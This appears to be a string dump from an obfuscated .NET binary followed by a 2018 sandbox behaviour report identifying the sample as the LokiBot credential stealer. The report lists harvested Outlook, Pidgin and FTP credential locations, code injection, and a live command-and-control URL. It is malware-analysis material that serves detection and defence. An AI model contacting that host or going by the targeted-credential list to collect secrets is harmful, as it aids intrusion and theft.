d{{a
Kh8):
mY8"
$3_@
dowa7PZnlB0RkWwUGsJ
+TC`
afyvuUwUA
RijndaelManaged
1FE~
6mKc
TV J
P2N v
^7/c
Rn(V
j7Q!
T~[5
*XG&^
n`ZVC
E*r9
& Zk
RQv
tntPulOcKN26N4LdTCD
ComponentSerializationService
Struct6
Struct7
Struct4
Struct5
Struct2
Struct3
Struct0
2=
SafeCancelMibChangeNotify
Ceiling
GetProperty
M|5;
$wh'
,W& x
a~ L
eJJcbHON6Im15HoRTfL
nH3wk
bool_3
bool_2
bool_1
bool_0
bool_6
bool_5
bool_4
1eO
TraceListenerCollection
SchemaElementDecl
-wcA&
cpml3
Z=Aa
/{g:
BB&e&
vZN6aXZ4RsWUyEjgYg9
uKB
#@4u_t
DrawListViewItemEventHandler
m_name
BinaryReader
bu`@
W x
}}@(
set_Key
h+0$
I*9
E/K
2kS{
9l ^H
@2nA(
|^uUC
_gVN*
/2;|n>#L
pI|D
\{Z'
#vlmX
(P
g@vmn
8sxS
/@T-
typemdt
M=X8
(@
KDOQS8ZmIUmKHGruno7
kIUk
ThisAssembly
O4d1.cM
}Yr
D5Cjp
KH7IaXBv9gGmY2CetJ
MethodInfo
IO+
{&{c
R^tfF
pT=Rf
qc{a
Atan
kmXH
ynEE8
CompilationRelaxationsAttribute
&*2(
!|iC
a4*=
ReflectedTypeData
cQwHL
m_isReadOnlycompareInfo
}TDC0
$`mSFf
8{I^
3z2K
+2&+E
MemoryStream
:2A2
F4ARcM
TrueSizeScalingType
kXhiIm37gwh0pWwwwq
^(+)
b$1=
P#eu
=<r]
;D7_
L[T[
M"L*
%53[
StreamSizes
ZoXsi
RegexParser
qLwwL
WNEmfLZX8ZrhVRP5SGf
xg7b
AH?9R
o6_6F
ContextMenuStrip
6xBy
PZQSSY
DfE
EJ'v
H)J _e4
5mZv
M-S:
bR-T
E~JU
X~Mh
vTZCa
R.+1
D5H>By
<kZ|
c:"!
lScdAWOWWhp55fsXyRv
a? |
"(Z
IEND
QuP#
p46B
E$yo\
L^U$1
tzq#v
N$>6
.%qb
i2a&8
? p1
4A-~L
"+Rx*
{h 0
n8ceRgr21hMEkDEfPq
q6%R[b9
B?@l
;R`u
Kz>JSTye
#ux-
O6
NE"N
[[pT(
Struct1
uk+
4&ro
_b`*b~
$[:.
[j;U
long_1
long_0
?@M<
long_2
^-6l"
rK!8
Aw*G/
^R@d
ITB1g16BiRvhD3ab6q
+Ud``
}](v
;t^xP
,/h
vH")
k0wBeQvX4LbinIwDGkR
CSharpCodeProvider
v(3B
memberInfo_0
binaryReader_0
"a3/[
double_0
double_1
si7!
^c>9',
rT"?
fyNS
!pF
t7y0
uJl ||
*^
9Q-+
YHHSR
51k#9
L"BPvj
System.Globalization.CultureInfo
W<uaB
SoapArrayInfo
Kqr~
JXZsl2OgEQBpTR5tkOl
CompilerGeneratedAttribute
/7xG
4DqA9
Rb2#Z
nqK
EY><
MarshalDirectiveException
1t&l
92NP4(
Rf368eZ14yjKeiUwIZn
"YUd
:>`Gy
FIV~
e,M0k
!4MC
0]uzTv
Gr0(
s? ~Kt
lPkj
u4#fKI
&P<;
sRGB
Copy
oRKWF
oDh\
>qM?B
System.Text
GetName
tP(9Y
,26v4
d`G|
-+E
97j&
8H"M
-KL8
c\p)
rNXV9=p
L5 N
(<I,
tIim$
{`o/
1no<
flags
2k
,B&
Bl@E
oP'*
5PVD[
[x%e{
HBYbvoZxeds7hra0IpL
System.Globalization.CompareInfo
>Rge$
"rhr
-<!8
k@vPCN
lS/
N)na
]c l#B_
Co0ffF
]c?oB
%(3s
Class9
Class6
Class7
Class4
Class5
Class2
Class3
Class0
Class1
';=!
;NZ*)
{R^M
b0C
K NL
g&uQ
=Om>
>hv)`\
VBWhHFgpIe5uLNIc3D
$$method0x600002a-1
$$method0x600002a-2
EJHp>~
d/c7
:l,qx
/.$r
uR<G
s[9w
gEMVPQODy69E853R0PT
;{P3
*L)Rs
SfBx5mvxwZ5iKUQ4bt8
qhRwNgOmCx4nAOQDdX0
0 0
xL_O
f=]f
M|&yc
FKlZd7OHfYrifBCkFRL
w( t
Exit
fXohU
i}D
|uYC
ICbiqdOvBImdNEGlJP8
44l*
!=qTn
IBuiltInPermission
-(+l
[MNQ
%cKT
'it
:`@[
E52Qh
String
t:s!
j{7s|
T&RCj
_CorExeMain
nVM1yrIxsWJcaDGZ.exe
r[+}
.Eq$
*irh
)]#H
%LM|
jODhtUOJDl14dnfSI41
MR30njOjjQUV9BV896p
S(?(
b2MnTUvhBSfCL4NER0H
PropertyStore
.e`N
THJI
tk
G{=u
percentGroupSeparator percentSymbol
DebuggingModes
N6>%-
Cv4LHKvFiKUHrcBLWgA
Z> N?"
InitializeArray
@DTW
<[~A
Fun
(= ]
}Km(WNz
`BC"@
f}0p
11~
Z8\pI
``,2
e}lY
]_m 2
?2v {
?#6w
C#3^
ToArray
ff[w+W
kX:At
'~(/
5kYle
:l s^jz
(mf+n;
9~T\
B)qj
0h&S,I
`uxC#
KdQMf
=#4u
&L{
module_0
lvG5GkdUAFVBgjiX0g
!(k*
CompilerParameters
[BrW
@4WID
@e19Q
&a8E
pD2O
bS]u
<AZE
S50i
1`84
TtJWpocJmU4uaZXjiA
$j+$
F%X]d
info
;@95r
jNbM0
Attribute
nrUGQFM3gp5XbhR24D
1 xHi
rAvkMPj
SX6Z4fEbNQpcsoO8yA
dtFP
[3Cn
HDHqQ
1img
U+zW
,iEX
6mE9
SafeArrayTypeMismatchException
& Vl
'#L?
ei8y5e
BeginInvoke
$ Vw
$k~d
wuPf
a{gW
,V'(
w?-K
DebuggableAttribute
!QaM
RmJa
xTrf
]I?'n
CallingConvention
6GlX
A.vS:
{eP@
hw)L
Reverse
#0<Q_
+t:.7]
>oA7
`4_!
{YS'
ge9L]
| xG
t|?f
4HWkk
T9+
<2N
5^k^*
Cb_A
RuntimeHelpers
Lj!
ct2h|
methodInfo_0
+K|R
h',#
validForParseAsNumber
FZ_f
(,W?
>ZYT
j]"l^
V1Why4vHlRtZYbrD1hF
g~>Z
[(|D
j9:
pR]_
XhD#
:~a#CS
'XS
^27;
4% t
-s /
&l^(
_r|g
jAb#&F
c+Oz
}c= 1
Object
F$Wj
<],Hk
byte_1
byte_0
byte_3
byte_2
byte_5
" +K
8[MG
?$O@
ComVisibleAttribute
D1?}
\]^z]
(z~L
D(|xP
9 ng
[pH
P7nf
oIgl
!t= t
IOcE
(- {
KA7o1vOYUL8Ce5uVLQq
BisZ
0~x|
@$Wd8B
`lj69
,EHO
83eDFZ8
kuFVuVZvKuDmriqbMh5
}T>3
UB9=4&
RaU
%9 K
M=@=R9
OGQAmtZrduEKuwVZRXp
VLA
[_&%
'>;
:EuO
rX<
AssemblyConfigurationAttribute
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
\7r@
\nK)wu
5GL*h
KGos
6?
6.k
l2$i
uxEkbMZBpwlFvSIkDTW
F4A0
T<<o
u,r6
Hashtable
%System.Globalization.NumberFormatInfo"
46qP
$wNc
\B1a
ZcGy
: 8ctt
O~DT,
n3lP
dH_I>
0:#:H
OGqCj9lSPS4qkq7VCP
}yOf
PL;'
DDiA2Vkh
object_0
> q(
woqLz
&I*uM
M\`20$ p
_p<i
DataGridViewCheckBoxCellRenderer
kPQ9xyZMti1AXCBPOfN
Stream
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
y^o=
}H4X
CEliPMORsrE7a9FAfvS
e~Ka]C+
KEHyO3ZYj3jRYtIYqJT
XmlSerializerImplementation
5rOk
r"M#
JLza
s*
_Z^`
8MnJ_
>>Jz
rEke
B=hA
RE-L
)DB"
`RMcN
tCOV5lOddCx3n9Cf0YM
=$O@
cF!My
F,,,
btz
FD\p
6 Yh
0)gJ+a3
=7 ),0i
HtT}
_hg!g
6(Y/
F2I?
;(d26$
EJ%>
EQF&
w wP9
LaJG
GJiH
g9uBE3vVb0ZU4P2DIra
("(#n
=e2atqf
6T`_
_'L=
7:)8
M[##
iw{<
r'E
^z/U
F9vC-Zf
Z#4g
!{?N8
$D[~ h
wx6a
f]uCC
LFeE
"C`E
DomainCompressedStack
*.r
percentDecimalDigits
VOXOPMvGfAFHj1o66Kq
.NET Framework 4
6Qwn
UecOFeZAohcabiOQ07y
S 2N =P
P 2 "
CryptoConfig
R|[?
&+cE
&9OGz
z;?
UIMDpGZamgtix23s5cR
W)6s
9`1y
+%#
mc l
u%B
Y>j
i\5R
1UiX
e(Fh>D
C,De
6zbV
EXPRBLOCK
kO\P
,G& >l
A[Ks;
9~\eE
KsgTFCZ9JG8Q8Z6plCj
OBJECT_ATTRIBUTES
)Z
QZ^&
% us
sRTFF7881cj1RTdiRx
iZ2VopjJeaeZ54rHtq
ComAwareEventInfo
+t/A
cK#
Ma(p
SIG[
a8%y
fBtm8LZW1ulhmEOLDcw
\)y
924}`
k[ $
C`d4
;D:s
jR`c]
P5VhLrOXm2O0owM1UfF
f S<
*Y/r
AfGEMpVZHgKcdJRSs6
2010
3kt
~wBi
hG0QcC
s5&62
AesCryptoServiceProvider
currencyDecimalDigits
qvgV
?{%1
eijKq\
41 p
k0?N
clXW
h7EbZHO5GRxUQGPrxfD
OU5eN14TYbfFx8DG2i
e1\6
=@26k
7)LE8t)
nVM1yrIxsWJcaDGZ
lR5VwCvpMnaFCKAqI28
Mk+=
set_IV
/dD=k
33!W/
&+6E
lF$oLj
<O1jB
adCfnSZcF9LYyCMOLTW
BqJ6H
B8xOiSOat7bqKWEMKEa
&+G
1_m6v.2
U\ZhP
g`Y]
OC/?b
B~j97
B,C]#
.`N@
53 ?
\kQY
q ~_2
LE%
s&yPT
E,q-
}k2T
cipherMode_0
HoistedLocals
^^Lv
HRIGI6vq1HeZ6AeYsK4
]_pt
r] F
Class10
Lp.m8B
fBA7
nYj%
3$whF~
[Sqj
:vv
VZd
AceQualifier
sQ74Yan7tw6MVwgaYC
9oaP
M5AUS0CkunTT7vQH7G
,nhZ[
^SY
SecurityDocument
. 5*
*8<4$
lqp,
Ssnr
'8/qnR
ll0-
eYG
=R9 +
Q[ebs
E LZ
8DVK
/9I,:
4.y4ZD^I
CreateDecryptor
%c[{
negativeInfinitySymbol
b iy
!OdF
cv3omvZlui8JdB1K5os
4,8Y
+ <
CheckForUpdateCompletedEventArgs
DehIyuOZgUSAJnSyPw3
A*'
XBn9oXvmtENKLsT67f7
A#gd
x/,
&+/&
B_+|
|^C2
Exception
Binn
OjStq8ZTcIQAC3hJnVK
\!2N
<"S+C
d[aE
wQGaXpZbHQptgy1k2NW
&(S
@<^
hB<PE8
b*G2
SessionStateRecord
6[="
Qe>j?N
pBnaclQbOYju
zY~$0`
7%L|a
lap4
maa 3
79GO
sKl9
D8I &
GetTypeFromHandle
IAsyncResult
O=|2~
Y3 c
Z8*
5{b7
'E{A
ENMkUpvLkN6k2iwVib.jOQDBSblkHe1GjR31l
SymmetricAlgorithm
=6{e
XsP#>L
V6W0
havk
percentPositivePattern
get_AllowOnlyFipsAlgorithms
DHL+kH^"
S /
M a,~O
ansiCurrencySymbol nanSymbol
OEVqc8fhZloruuiNoS
c\h,9
Tra
#@,97!
F4xj
MsX({
;.wd
:EUN
Slwg
XdCJIBZCe1XHX0LROro
hOdBJDd
G'q0
5kC 0
9]g
n7%y
K\<
sDnC9lZtpyGounhVZAv
>{?g
y0dv
qc%E
CompilerMarshalOverride
`} }
XlsV0UqnfWrKXe0dgE
CckS
FileAccess
B0/H
L@pQ0V
qhSL
[pS
x[_
dCN65IZzUEfuGv6Wlkh
set_Position
CTNq
Z^>G=
dUBV
\Z2xQ
mAOQl4H0Ps2gKEeFFW
BJ)j
IZ5eD#`
}BY U
System.Runtime.InteropServices
Hncsi5
AyQk
gE(?
BZp|
t-HC
Y;!
Math
51XR,
UnmanagedFunctionPointerAttribute
Psg/
De'r
\<rMUsI
&*^
0]l
Sdm9unOKQ20mfuI1AOV
6.9?kT
}f2i
nhUm
EKbgrhOQbdUgrBQh8rr
RUSUaBOrZWoyQpCjFOR
\bHN
~>h
i
g^ KB
symmetricAlgorithm_0
^dwh
sK%{
HGY,r|
?zA8D
VB.LWG
;h=Y!d
sRaqXtcXvXuGVGub0N
wVCxyavSODhHnBBFhQ9
Z}CP
@:fxx
~vHK
K}t{
diZZNvZH2EeLiE9tamM
@$1w
Zl:=
":-s#
JN18F
F9]SdV~
KoR+E[
Y}Wf
*
0c9d
bM?Ex
&*2(
'}ba+
set_CompilerOptions
|Rc|
U~'d
xH_W- nh1
ObR-
BKfvH4Z2hmTjgYQID9e
TRACE_GUID_INFO
j4*
PV^D
SrkE
7v"t
f/d Y
}Ayr
RZxZ
M49k
nMIiC
tD$"
@c Q S
nSi
1Dbj$
hgXXAwT3YJtaglSqCR
Xp?
6Cj}
WZC
0##V[P
F^7-
Zd$YR
db )
YEr8lt65n`1
IDisposable
Adr2
;|o.C
&9rX
Exists
xH5QIEgohcacmEXOUD
RO@(
ScrollProperties
currencyGroupSizes
6pRCJ
j(jP|P
set_Mode
TG(v%w
Em_9Ng
cjK
Ci!Vj
f'08
q~rt*
qN+_
~Q`8
/5 9&
AssemblyProductAttribute
AvJal@
\6"n
}Mh1
A&b#'
]^<^
<Mo@
=R9+
,[.'
@J%H
dJ:+W
b)R<
7/U,
I(J7
MulticastDelegate
U8>0gC.
kjA!
\j!
jrUuJ2JsKpVrf3SLUq
ComputeHash
'hI<
?l=q
uh}i
i17-n
f_Bz
G4w
X-*RkE5
r*-H9
uint_3
uint_2
uint_1
uint_0
uint_7
uint_6
uint_5
uint_4
oaD
)e -
^$;L
~?6j9e
:{\#T
FvT9f
0&hH
a 78
$wB#
:dz\
2vCI
e$CsSic^N\KGkEM
NP.[q
:9An
.Ibk
CreateEncryptor
)9 &T
Yn!3
wG4PRdjS7qFoLTeFi1
`lE9Q
IxI59*
&oI%
nativeEntry
#GUID
SparselyPopulatedArrayAddInfo`1
FKYdmrL7C9ypGweAns
Y,_;
>JCY'
)1{3T
L5[z
}"Fc*W
y8q"a
`w:w
u]vH[
E`y
7<x
{N|
l=T`
}&y@
Rj2i
!@Gn
*S,U
V&@
@Z
"*u%
=1Bg
percentGroupSizespositiveSignnegativeSign
fR35JeZVLmPc573acqD
s kH
@cUCuM
Xo|P
t +\l30oXv
\|Y1
EnpiyJ0LY329gLwRHx
AnA$
G^.c
\o![
'c\3
wh$s
TLLXVHOV87x1mh8uqFF
d25X9xD6MHbd8ReYtC
M@ i
Attribute0
Nullable`1
nAzvTFu
wx4r
3n>u
-(A
adVg!OA]8
S{2w
jiY<
^v/Zg
=|jP
ig>
GetPublicKeyToken
QT1q0eZIese5pIMYrLd
System.Globalization.TextInfo
aZ3RovOL6MmiclwYali
Rc7W,
iS@i
#O@0R`
o.3+
&8\M
sBQU
z@7!
PB7~
8#>`}
CodeStatementCollection
sw9bCkOkRq3gSN9uXXP
X +#
jBY"
SetValue
FdnU2
Encoding
;v"M
5jf~AQ
P?Y/
GetFields
&Gl#
w#$9k
X''>d*
calendar m_dataItem cultureID
*{;_
Huwl{
2Bl?
C6Vd92OsZoWd7y1NYCO
X_y=
{itZ|
LUx+
Y0H7#G6
&+4&
[#+1<(
cMoj
-D&
/qpD3
U3W(K
|}nH
2w/R
AU4OAQkknJkSLdYO3r
+a 2l
+ &+ #
YK9I+
3+4h
|*wt
/=D
E|'p
7 ,OG#?
(+,5
$9k^D7
B7uk4
D^b%
m_^
_L u#v
&#@,97!
D:W1
>^Ye_9
\ 8:
Replace
Zero
'X2/
w=A(
eD1*
stream_0
{~RdO
?z:
6P{F
Y7bK
Sqrt
'cO
NmtdnYruWnch
;1EY
UvBL
6ImX
kawX
qm!O
`rLJH1
At&~}
Ty\c
AdD
M-W/
OqMj
v`b<
Mr5tNazf8bDL6bOHWL
) M;
q"fG
E{QMN
dT,A
:=Lc
UakH
hXbd
6i'^
KSZXkMPxWKa5YPscWG
[]]cT
F]9#:
vo-~
hJ8px
s>:<
(XPKm
""2
S{|u "z
t[gt
cG+
F X]}
i5>
\K?T
UdAC
Qb)2
jQatjYvZvl1GNAPu0bb
s[]0]
#/ f
(F(ig:
zCK
H,oX
: ;F
f5~/B
4 u#G
LGb%/=
E&J
WriteLine
xeMto
S[k:
c_td
y\;r`
customCultureNamem_nDataItem
w$q2
?_d
, &
&raM
]R>M2
ybrJB[
, &(
HQ_9
X9 {
-_N#
4r%nT
eo6"^M
xh
QQT0mbvMZmw3TPx4Wlv
fkSaBxZFYXG09DJAvoi
f-S>
3>>v
:5-
HZEW
nFL`
qA65pwZk0bpDqySOB3R
1k>E2
JR>.
atVf?
C O@
s-cg,
kk#}
BNKO
cL6Hx
Ly$#
@"i^
runtimeFieldHandle_0
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven06_64 | Seven06_64 | VirtualBox | 2018-06-25 21:39:47 | 2018-06-25 21:43:03 | 196 |
15 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Collects information to fingerprint the system
Severity: High
Confidence: High
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
- file: C:\Users\Seven01\AppData\Roaming\E62877
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: Our20Order.exe(2488) -> vbc.exe(2872)
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 6.89, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00013600, virtual_size: 0x00013534
- section: name: .rsrc, entropy: 7.42, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00026800, virtual_size: 0x00026800
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://abatii.web.id/apaci/Panel/five/fre.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://abatii.web.id/apaci/Panel/five/fre.php
At least one IP Address, Domain, or File Name was found in a crypto call
Severity: Medium
Confidence: Very High
- ioc: 5.707868E
- ioc: 1.405055E-32
- ioc: 1482.645
- ioc: 2.999816E-34
- ioc: 0.05230538F
- ioc: -9.973313E-32
- ioc: 0.00178666
- ioc: -0.009339046
- ioc: 3.867544E
- ioc: -1.185655E
- ioc: 1.0.0.0
- ioc: pplication.app
- ioc: asm.v2
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: vbc.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds
Creates RWX memory
Severity: Medium
Confidence: Medium
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven06_64 | Seven06_64 | VirtualBox | 2018-06-25 21:39:47 | 2018-06-25 21:43:03 | 196 |
10 Summary items with data
Files
